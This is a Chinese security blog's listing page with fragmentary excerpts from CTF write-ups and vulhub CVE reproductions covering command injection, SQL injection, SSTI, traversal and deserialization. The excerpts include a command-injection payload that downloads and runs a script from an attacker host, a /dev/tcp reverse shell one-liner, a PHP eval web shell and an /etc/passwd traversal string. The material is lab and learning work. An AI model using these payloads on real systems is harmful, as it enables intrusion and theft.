shierbai的博客

原创 [第二章 web进阶]死亡ping命令

127.0.0.1%0acurl B/1.sh > /tmp/1.sh #请求bash文件到tmp目录。1.先在B上面写一个1.sh文件里面是读取flag的命令，同时命令连接符去做目标主机端口监听。127.0.0.1%0achmod 777 /tmp/1.sh #给bash加权限。这里不想搞公网ip去做操作，看了一下别人用小号搞了一台内网主机。这里试了很多连接符，发现只有%0a可以绕过。这样会在B机器上面得到发过来的flag。2.然后通过命令注入让A执行。3.命令注入让A执行。

原创 [第二章 web进阶]SSRF Training

原创 [第一章 web入门]afr_3

这样在后续才可以完成文件包含，这里伪造cookie是为了执行里面的代码，不是单纯的绕过认证，这里不加cookie会默认让cookie为n1code，至于后面那个/article接口只是在有flag字样时候展示notallow.txt，并不能完成攻击得到flag。flask_session_cookie_manager3伪造cookie。得知这里涉及ssit注入和flask模板注入，但是不理解怎么识别出来的。不同目录也是输flag会出现，猜测有黑名单。-t 指的是加密密文（ssti）-s 指的是加密密钥。

原创 [第一章 web入门]afr_2

但是这里配置/img没加/，那么认为没有被闭合好，并且只能是配置这边配好才可以闭合，外部输入的/不会影响我后面继续跨目录。可以加入../，会变成/HOME/imges/../而这里缺少，则可以通过img../去到autoindex设定的路径下比如原本是/HOME/imges/这里我理解是以/作为一种分割，配置这个就可以让人为加的../不生效。这里还可以借助这个错误的img的自动索引配置穿越到其他位置。错误配置导致，location缺少了一个/配置Nginx以避免目录遍历。指令来避免目录遍历尝试。

原创 [第一章 web入门]afr_1

尝试无果，猜测是不是做了隐藏，之前有过要用伪协议做base64编码才会显示的。尝试跨目录，感觉应该就在这，级数增多就没有东西了。看样子要等价掉，可能对flag字样做了拦截。hackbar自带poc，稍作修改。

原创 [第一章 web入门]SQL注入-2

这里感觉是被处理了，但不确定是哪个字段有问题，根据前面concat应该没问题，猜测是select，from，where，试验之后发现对select做了检查和处理，但是可以大小写绕过，表名fl4g。不清楚哪个位置有sql问题，此处不清楚是要做脱库还是要绕过登录，都试一把。发现做绕过登录是绕过不了的，尝试注入出信息。可以看到开启错误提示大概率可以使用报错注入。解密一下test123!可以测试出存在名为admin账号。可以看到对错误信息不够模糊。裤子都脱了给我看这个？f12查看捕捉到提示。得到数据库名note。

原创 n1book粗心的小李

使用githack工具dump下来网页即可。

原创 n1book web1信息收集

2..index.php.swp这样的会触发下载，需要使用vim -r index.php.swp去做修复才能看。可以使用dirsearch的--delay n和-t n控制延时和线程数量避免429。访问robots.txt，访问里面给出的接口拿到第一部分flag。最后使用curl -o 1.swp xxxxxx（靶场url）1.使用目录扫描工具会遇到429请求过多。再vim -r 1.swp得到第三段。访问index.php~得到第二段。使用dirsearch扫描。

原创 学习小结8.25

eval($_POST['a'])

原创 爬取必应关键字搜索结果url

使用的话，在该目录下cmd运行即可。

原创 一个简单的盐值md5破解

这里自己琢磨了一下，用python写了一个简易工具，由于md5是不可逆的，但我们可以去尝试用盐值加上字典里的明文密码去拼接然后加密和密文做对比，暴力枚举。我是做vulhub的cmsms复现的时候，用他的poc跑出来密文和盐值，发现这个是做了字段拼接再加密，也就是加盐了，然后没办法直接依靠在线网站做解密。首先需要获取到salt值和密文，自己有字典。声明，仅供学习，请勿用于非法用途！

原创 Adobe ColdFusion 文件读取漏洞（CVE-2010-2861)

locale=../../../../../../../../../../etc/passwd%00en`，即可读取文件`/etc/passwd`locale=../../../../../../../lib/password.properties%00en`搭建环境后，访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`，可以看到初始化页面，输入密码`admin`，开始初始化整个环境。

原创 CMS Made Simple (CMSMS) 前台代码执行漏洞（CVE-2021-26120）

因此，如果CMSMS版本低于2.2.9.1，未授权的攻击者可以结合[CVE-2019-9053](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2019-9053)和CVE-2021-26120漏洞，在服务器上执行任意代码。根据页面中的安装向导来进行，其中MySQL数据库的地址是`db`，数据库名是`cmsms`，账号和密码均为`root`搭建环境访问`http://your-ip/install.php`并安装cms服务。

原创 CMS Made Simple (CMSMS) ＜ 2.2.10 前台SQL注入漏洞（CVE-2019-9053）

结合后台的 SSTI 漏洞（[CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)），攻击者可在目标服务器上执行任意代码。安装过程请根据页面中的安装向导来进行，其中MySQL数据库的地址是`db`，数据库名是`cmsms`，账号和密码均为`root`。使用中的脚本来利用SQL注入漏洞。

原创 Celery ＜4.0 Redis未授权访问+Pickle反序列化利用

在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递，当所用队列服务（比如Redis、RabbitMQ、RocketMQ等等等）存在未授权访问问题时，可利用Pickle反序列化漏洞执行任意代码。Celery 是一个简单、灵活且可靠的分布式系统，用于处理大量消息，同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列，同时也支持任务调度。漏洞利用脚本`exploit.py`仅支持在python3下使用。这里poc已经设置6379端口，使用时直接打靶机ip就行。

原创 Cacti 前台命令注入漏洞（CVE-2022-46169）

在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。这个漏洞的利用需要Cacti应用中至少存在一个类似是`POLLER_ACTION_SCRIPT_PHP`的采集器。环境启动后，访问`http://your-ip:8080`会跳转到登录页面。使用admin/admin作为账号密码登录，并根据页面中的提示进行初始化。实际上初始化的过程就是不断点击“下一步”，直到安装成功。其中``包裹的内容会被作为命令执行。

原创 Bash Shellshock 破壳漏洞（CVE-2014-6271）

服务启动后，有两个页面`http://your-ip:8080/victim.cgi`和`http://your-ip:8080/safe.cgi`。其中safe.cgi是最新版bash生成的页面，victim.cgi是bash4.3生成的页面。将payload附在User-Agent中访问victim.cgi。safe.cgi则不行。然后构造payload。

原创 Aria2 任意文件写入漏洞

因为rpc通信需要使用json或者xml，不太方便，所以我们可以借助第三方UI来和目标通信，如 http://binux.github.io/yaaw/demo/。6800是aria2的rpc服务的默认端口，环境启动后，访问`http://your-ip:6800/`，发现服务已启动并且返回404或空白页面。打开yaaw，点击配置setting按钮，填入运行aria2的目标域名：`http://your-ip:6800/jsonrpc`注意此处只是为了真实环境区别，我这里靶机和攻撃机是同一台。

原创 AppWeb认证绕过漏洞（CVE-2018-8715）

其7.0.3之前的版本中，对于digest和form两种认证方式，如果用户传入的密码为`null`（也就是没有传递密码参数），appweb将因为一个逻辑错误导致直接认证成功，并返回session。- digest 改进版HTTP基础认证，认证成功后将使用Cookie来保存状态，而不用再传递Authorization头。利用该漏洞需要知道一个已存在的用户名，当前环境下用户名为`admin`。访问`http://your-ip:8080`，可见需要输入账号密码。到重放器会看到session。

原创 Apache APISIX Dashboard API权限绕过导致RCE（CVE-2021-45232）

Apache APISIX Dashboard 2.10.1版本前存在两个API`/apisix/admin/migrate/export`和`/apisix/admin/migrate/import`，他们没有经过`droplet`框架的权限验证，导致未授权的攻击者可以导出、导入当前网关的所有配置项，包括路由、服务、脚本等。然后访问`http://your-ip:9000/`即可看到Apache APISIX Dashboard的登录页面。进去ggdG清除内容复制进来。

原创 Apache APISIX 默认密钥漏洞（CVE-2020-13945）

Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下，Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`，攻击者利用这个Token可以访问到管理员接口，进而通过`script`参数来插入任意LUA脚本并执行。环境启动后，访问`http://your-ip:9080`即可查看到默认的404页面。利用默认Token增加一个恶意的router，其中包含恶意LUA脚本。

原创 Defend The WEB-Intro1-12

hackthisintro总体难度挺小。

原创 Apereo CAS 4.1 反序列化命令执行漏洞

Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。然后我们登录CAS并抓包，将Body中的`execution`值替换成上面生成的Payload发送。访问`http://your-ip:8080/cas/login`即可查看到登录页面。漏洞原理实际上是Webflow中使用了默认密钥`changeit`如果报错试试换java版本。

原创 Apache Druid 代码执行漏洞（CVE-2021-25646）

Apache Druid是一个开源的分布式数据存储。Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用，并且默认是禁用的。然而，在Druid 0.20.0及以前的版本中，攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码，而不管服务器配置如何，这将导致代码和命令执行漏洞。

原创 [GXYCTF2019]Ping Ping Ping1

直接上结论，过滤诸多字符，如<>,{},/等等，过滤flag,然后cat无效，空格的url编码不行。fla$a.php代替flag.php。这里用cat会显示不出，用tac从最后一行开始读。这里&&无法做到两条命令都执行。使用$IFS$9代替空格。

原创 [ACTF2020 新生赛]Exec1

用&&连接同时执行多条指令。

原创 [GYCTF2020]Blacklist1

MySQL 除了可以使用 select 查询表中的数据，也可使用 handler 语句，这条语句使我们能够一行一行的浏览一个表中的数据，不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句，并没有包含到SQL标准中。然后就是到这里，又需要用到Handler语句去不必提及flag列名就可以读取表内容。这里是有想到报错注入，但后来发现这个flag给过滤掉了。堆叠注入以及mysql的Handler语句。OPEN语句打开一个表。这关过滤了非常多东西，也让我学到新的姿势。

原创 Apache Airflow 默认密钥导致的权限绕过（CVE-2020-17526）

Apache Airflow是一款开源的，分布式任务调度框架。默认情况下，Apache Airflow无需用户认证，但管理员也可以通过指定`webserver.authenticate=True`来开启认证。

原创 Apache Airflow Celery 消息中间件命令执行（CVE-2020-11981）

通过未授权访问，攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令，参数为命令执行中所需要的数组。我们可以使用[exploit_airflow_celery.py](exploit_airflow_celery.py)这个小脚本来执行命令touch /tmp/airflow_celery_success。python exploit_airflow_celery.py [靶机ip]执行成功会创建一个这样的文件。

原创 airflow/CVE-2020-11978复现学习

命令注入漏洞哇真有点卡。

原创 [极客大挑战 2019]BuyFlag1

明显的信息，页面源码，说明要post两个东西，password需要等于404且不可以是数字。我很确定是8个零，难道是要大于1e8的，这里是先做密码校验再进行money的值比较的。这次密码正确了，但提示数字过长，那么就是考虑如何缩短那一长串0了。这下有回显了，但说我们的密码错误，尝试看看校验函数能不能绕过。直接转换了请求方式post了密码和钱没反应。然后money需要等于100000000。观察到有cookie，此处user=0。这里首先想到科学计数法，1e8。

原创 CVE-2021-43008复现学习

1.使用[mysql-fake-server]启动一个恶意的MySQL服务器。在Adminer登录页面中填写恶意服务地址和用户名`fileread_/etc/passwd。在adminer出输入恶意ip和用户名，这个脚本是根据输入用户名来返回读取文件的，如果你输win那就是读取/windows。注意，python版本需要在3.4-3.6之间，否则需要对脚本进行修改。文件会读取到fileOutput文件夹下。我是win10,64位。

原创 CVE-2021-21311复现学习

如图在物理机（不属于上述任何一个ip）输入要访问的主机及其端口（这里这个ip就是在环境中属于内网我们无法直接访问到的那个服务器，而通过ssrf可以让我们伪造另一个服务端去发送请求来返回我们想要的数据），可以看到在139端显示这个请求是由138发出的，而不是自己的ip，这样就完成了ssrf，不过在利用上博主还不太能够善用。adminer版本是4.7.8，是php编写的数据库管理工具，存在漏洞CVE-2021-21311，它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。

原创 CVE-2023-46604复现学习

Apache ActiveMQ是一个开源的、功能强大的消息代理（Message Broker），由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service（JMS）1.1 和 2.0规范，提供了一个高性能、简单、灵活和支持多种语言（Java, C, C++, Ruby, Python, Perl等）的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。

原创 CVE-2022-41678复现学习

访问即需要输入密码，进去是在index.html页面，这里切换到admin查看版本5.17.3ActiveMQ中，经过身份验证的攻击者可利用该漏洞，通过Jolokia服务发送特制的HTTP请求写入恶意文件，进而实现远程代码执行。

原创 CVE-2016-3088复现学习

本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。：ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；还是不行，因为我是本地复现，不存在需要vps啥的，这里怀疑是因为环境问题，也许是jdk的版本不支持啥的，之前复现log4j2的时候也遇到过这里就不再赘述了。2.文件操作容易出现漏洞。

原创 CVE-2015-5254复现学习

使用[jmet](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)进行漏洞利用。影响版本：Apache ActiveMQ 5.13.0之前5.x版本，https://www.cvedetails.com/cve/CVE-2015-5254/实际环境下，需要诱导管理员点击我们构造的url去做访问，触发反弹条件。bash -i>/dev/tcp/攻击机ip/1234（监听端口） 0>&1。

原创 [极客大挑战 2019]HardSQL1

闭合条件，注意，必须做url编码，否则不能闭合。试了良久都没什么成果，知晓的报错注入是有希望的。用right(xxx,int)从右往左截取字符。其他的也试过了，order by 不太能。报错注入需要空格，或 或者 且,等号。试试用bp做符号爆破看看过滤情况。这里测试()存活,^和&&也在。感觉学到不少东西，曼波。784的全是被逮住的。但&&此处报语法错误。

原创 [极客大挑战 2019]LoveSQL1

宝贝这么直接吗哈哈哈哈哈哈，这倒是，只要你不让我盲注（输一大堆麻烦）我就不sqlmap居然是get报错此处--+无法注释，#可以，还没用and 1=测试就知道是字符型且闭合条件为'xxxxx'这个用联合查询注入最方便我用了报错注入途中对自己的闭合条件产生怀疑，于是做了这个测试，但这并不是flag，继续做注入得到库名，爆破表名。

原创 [MRCTF2020]你传你呢1

这里可以看到只改了文件名后缀，害怕万一是白名单的是jpeg，没有jpg，我还测试了一下png，也是同样的结果，所以一定做了mime。可以看到是成功的，也就是说，文件名后缀是做黑名单处理，那么尝试各种黑名单绕过手法上传php，但不确定是否是mime检测，抓包改一下看看，当然你也可以直接传图片马，只考虑路径和执行即可。博主文件包含学的不是很好，到这里就放弃做文件包含了，博主发现加个点就完事的。也可以看到文件名后缀是有过滤的，但仅凭此还不能确定后缀名是白名单。如图，并不存在文件解析漏洞，考虑文件包含。